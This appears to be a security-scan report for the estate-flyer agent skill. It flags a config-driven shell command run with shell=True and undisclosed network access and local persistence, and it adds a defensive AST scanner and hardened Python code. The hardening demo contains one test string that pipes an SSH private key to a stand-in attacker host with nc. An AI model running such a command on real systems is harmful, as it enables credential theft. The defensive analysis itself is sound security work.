estate-flyer

Security checks across malware telemetry and agentic risk

Overview

This skill does what it advertises, but it includes an overbroad configurable shell-command path and automatic local persistence that users should review before installing.

Install only if you are comfortable with a skill that can run Bash commands, contact Weibo and other real-estate and content sources, and save profiles and generated outputs locally. Review or remove the external_command option before use, keep runtime.json writable only by trusted users, and do not feed it confidential project details unless you accept the external-search and local-archive behavior.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Behavioral AST: exec() Call, eval() Call, Dynamic Import
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
Findings (12)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
    skill_dir = Path(__file__).resolve().parents[1]
    cmd, timeout = build_command(skill_dir, args.limit)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=timeout)
    if proc.returncode != 0:
        print(json.dumps({'ok': False, 'command': cmd, 'stderr': proc.stderr.strip(), 'stdout': proc.stdout.strip()}, ensure_ascii=False, indent=2))
        sys.exit(proc.returncode)
Confidence
96% confidence
Finding
proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=timeout)
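The following is an added example, not code from SkillSpector or from the estate-flyer skill, of how a Behavioral AST rule of the kind behind this finding is implemented: parse the source, walk the tree, and match call sites against the three listed patterns (subprocess module call, eval()/exec() call, dynamic import). The sample source is the excerpt quoted above, completed with constructed imports and a function header so that it parses; build_command stays undefined because the scanner only parses and never executes the file.

```python
from __future__ import annotations

import ast

# Constructed sample: the excerpt quoted in the finding above, completed with
# imports and a function header so that it parses as a module. build_command
# is deliberately left undefined; this scanner parses, it never runs the code.
SAMPLE = '''\
import json
import subprocess
import sys
from pathlib import Path

def main(args):
    skill_dir = Path(__file__).resolve().parents[1]
    cmd, timeout = build_command(skill_dir, args.limit)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=timeout)
    if proc.returncode != 0:
        print(json.dumps({'ok': False, 'command': cmd, 'stderr': proc.stderr.strip()}))
        sys.exit(proc.returncode)
'''

# Callees that spawn processes or import modules by name (the rule sets are
# an assumption; the page lists the pattern names, not the matched callees).
SUBPROCESS_FUNCS = {"subprocess.run", "subprocess.call", "subprocess.check_call",
                    "subprocess.check_output", "subprocess.Popen"}
DYNAMIC_IMPORT_FUNCS = {"__import__", "importlib.import_module"}


def callee_name(node: ast.Call) -> str:
    """Dotted name of the callee ('subprocess.run', 'eval'), or '' when the
    callee is not a plain name/attribute chain (e.g. a call on a call result)."""
    parts = []
    f = node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if not isinstance(f, ast.Name):
        return ""
    parts.append(f.id)
    return ".".join(reversed(parts))


def keyword_is_true(node: ast.Call, name: str) -> bool:
    """True when the call passes name=True as a literal keyword argument."""
    return any(kw.arg == name and isinstance(kw.value, ast.Constant)
               and kw.value.value is True for kw in node.keywords)


def scan_source(src: str) -> list[dict]:
    """Walk the AST and report every call matching one of the three patterns,
    in source order. shell_true records a literal shell=True on the call."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        name = callee_name(node)
        if name in SUBPROCESS_FUNCS:
            findings.append({"line": node.lineno, "rule": "subprocess module call",
                             "call": name, "shell_true": keyword_is_true(node, "shell")})
        elif name in ("eval", "exec"):
            findings.append({"line": node.lineno, "rule": f"{name}() call",
                             "call": name, "shell_true": False})
        elif name in DYNAMIC_IMPORT_FUNCS:
            findings.append({"line": node.lineno, "rule": "dynamic import",
                             "call": name, "shell_true": False})
    findings.sort(key=lambda f: f["line"])
    return findings


if __name__ == "__main__":
    for finding in scan_source(SAMPLE):
        print(finding)
```

Run against SAMPLE this reports exactly one hit, subprocess.run on line 9 with shell_true set, which is the line the finding quotes. Two limits of purely syntactic matching are worth knowing when reading such reports: `from subprocess import run` or an aliased import produces a different callee name and is missed unless import bindings are resolved, and `shell=flag` with a non-literal value cannot be classified without data-flow analysis, so a shell_true of False means "no literal True seen", not "safe".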

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The code explicitly supports an externally configurable command path through runtime configuration, even though the stated function is just fetching Weibo hot-search data. That design grants generic code-execution capability to configuration content, expanding the skill from a data-fetching helper into a command runner.

Context-Inappropriate Capability

High
Confidence
98% confidence
Finding
At execution time, the configured command string is passed directly to the system shell (shell=True), which enables shell metacharacters, pipelines, redirection, and command chaining. Combined with the previous finding, whoever can write runtime.json can run arbitrary commands. In the context of a simple trend-fetching skill this is far more capability than necessary and can be abused for full arbitrary code execution, data exfiltration, or persistence.
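As an added example, not code from the skill or from the scanner, the following Python closes the two findings above and implements the runtime.json advice from the overview: the configuration file is honored only when it is a regular file owned by the current user and writable by nobody else, the configured command is tokenized with shlex rather than handed to a shell, the executable must be on an allowlist, and the result is run with shell=False so pipes, redirects and chaining cannot be expressed at all. The allowlist, the default command, fetch_hot_search.py, and the exact layout of the external_command key are assumptions; the page names runtime.json and the external_command option but not their schema.

```python
from __future__ import annotations

import json
import os
import shlex
import stat
import subprocess
import tempfile
from pathlib import Path

# Hypothetical allowlist of executables this fetcher is permitted to spawn.
ALLOWED_COMMANDS = {"curl", "python3"}
# Hypothetical default used when runtime.json supplies no external_command.
DEFAULT_COMMAND = ["python3", "fetch_hot_search.py"]
# Any of these inside an argument means someone is smuggling shell syntax.
SHELL_METACHARS = set(";|&`$<>\n")


def runtime_config_is_trusted(path: Path) -> bool:
    """Honor runtime.json only if it is a regular file (not a symlink), owned
    by the current user, and writable by no one else."""
    try:
        st = path.lstat()
    except FileNotFoundError:
        return False
    if not stat.S_ISREG(st.st_mode) or st.st_uid != os.getuid():
        return False
    return not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def build_command(skill_dir: Path, limit: int) -> list[str]:
    """Hardened counterpart of the skill's build_command: returns an argv list
    instead of a shell string, and validates anything that came from config."""
    argv = list(DEFAULT_COMMAND)
    cfg_path = skill_dir / "runtime.json"
    if runtime_config_is_trusted(cfg_path):
        external = json.loads(cfg_path.read_text(encoding="utf-8")).get("external_command")
        if external:
            argv = shlex.split(external)  # tokenize ourselves; never hand the string to sh
    if not argv or Path(argv[0]).name not in ALLOWED_COMMANDS:
        raise ValueError(f"command not allowlisted: {argv[:1]!r}")
    for arg in argv[1:]:
        if SHELL_METACHARS & set(arg):
            raise ValueError(f"shell metacharacter in argument: {arg!r}")
    argv.append(f"--limit={int(limit)}")
    return argv


def run_fetch(skill_dir: Path, limit: int, timeout: float = 30.0) -> subprocess.CompletedProcess:
    """shell=False: argv goes straight to execve, so pipes, redirects and
    command chaining in config text are impossible rather than merely filtered."""
    return subprocess.run(build_command(skill_dir, limit), shell=False,
                          capture_output=True, text=True, timeout=timeout)


def demo() -> dict:
    """Exercise the checks against a constructed runtime.json in a temp dir."""
    out = {}
    skill_dir = Path(tempfile.mkdtemp())
    cfg = skill_dir / "runtime.json"

    def set_config(cmd: str, mode: int) -> None:
        cfg.write_text(json.dumps({"external_command": cmd}), encoding="utf-8")
        os.chmod(cfg, mode)

    def attempt(label: str) -> None:
        try:
            out[label] = build_command(skill_dir, 5)
        except ValueError as e:
            out[label] = f"rejected: {e}"

    set_config("curl -s https://example.invalid/hot", 0o600)
    attempt("trusted_config")                 # honored
    set_config("curl -s https://example.invalid/hot", 0o666)
    attempt("world_writable_config")          # config ignored, default used
    set_config("curl -s x; cat ~/.ssh/id_rsa | nc attacker.invalid 1", 0o600)
    attempt("chained_command")                # rejected: ';' and '|' are now just text
    set_config("bash -c whoami", 0o600)
    attempt("not_allowlisted")                # rejected: bash is not on the allowlist
    return out


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The permission check is what makes "keep runtime.json writable only by trusted users" enforceable instead of advisory: a group- or world-writable file is silently ignored and the built-in default runs. Note that the metacharacter scan is belt-and-braces; with shell=False the characters would be passed as literal argument text anyway, but a trend fetcher has no legitimate reason to send them, so rejecting them makes tampering visible in the error instead of in the target program's behavior.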

Vague Triggers

Medium
Confidence
91% confidence
Finding
The summary/description defines broad natural-language triggers for marketing assistance that can easily overlap with ordinary user requests. This raises the chance of unintended skill activation, causing the agent to perform network access, file reads/writes, and image-generation side effects when the user did not explicitly consent to this workflow.

Vague Triggers

Medium
Confidence
95% confidence
Finding
The listed entry triggers include common phrases such as writing marketing copy or a social post for a property, which are insufficiently constrained and likely to match benign requests. In this skill, accidental invocation is more dangerous because activation immediately commits the agent to external scanning, local file persistence, and possible direct image generation.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The skill mandates archiving results locally as part of every run but does not disclose persistence to the user. Silent storage of generated content and project data can violate user expectations, create privacy issues, and leave sensitive business or research material on disk without informed consent.

Missing User Warnings

Medium
Confidence
96% confidence
Finding
The workflow requires internet searches and hot-search scanning, including use of multiple external sources, without any user-facing warning that data may be transmitted externally. Even if the queried subject is a property name, the user’s intent, research target, or associated context may be exposed to third parties unexpectedly.

Missing User Warnings

Medium
Confidence
97% confidence
Finding
The skill prioritizes automatically sending prompts to a 'current local model' for image generation and explicitly says this must be done rather than merely returning a prompt. Automatic forwarding to another model endpoint without confirmation can leak sensitive project details, create unintended charges or compute use, and trigger side effects the user did not request at that moment.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
When no estate profile exists, the skill requires collecting information from at least five external sources and then writing the compiled profile locally, but it provides no notice about that storage. This can accumulate third-party content, business intelligence, and potentially inaccurate or sensitive notes on disk without the user's awareness or consent.

Missing User Warnings

Low
Confidence
90% confidence
Finding
The template explicitly encourages sending prompts to an external image-generation service and notes the skill may directly generate images in the current environment, but it provides no warning that content may be processed by third-party systems or that prompts could contain sensitive business or personal data. This can lead users to disclose confidential information without informed consent, creating avoidable privacy and data-handling risk.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The workflow explicitly instructs the agent to write `profile.md` and `profile.json` to local storage, but it provides no requirement to notify the user or obtain consent before modifying files. In an agent setting, silent persistence can create privacy, integrity, and trust issues, especially if users do not expect local state changes or if later runs consume stale or poisoned cached data.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The workflow mandates internet searches across named third-party platforms and requires at least five external sources, but it does not instruct the agent to disclose that network access will occur. This can expose user queries or sensitive targets to external services, create privacy/compliance concerns, and violate user expectations in environments where outbound requests must be explicitly approved.

VirusTotal

66/66 vendors reported this skill as clean. A clean antivirus verdict does not address the findings above: a configurable shell-command path and undisclosed local persistence are design properties, not malware signatures, and no engine flags them.
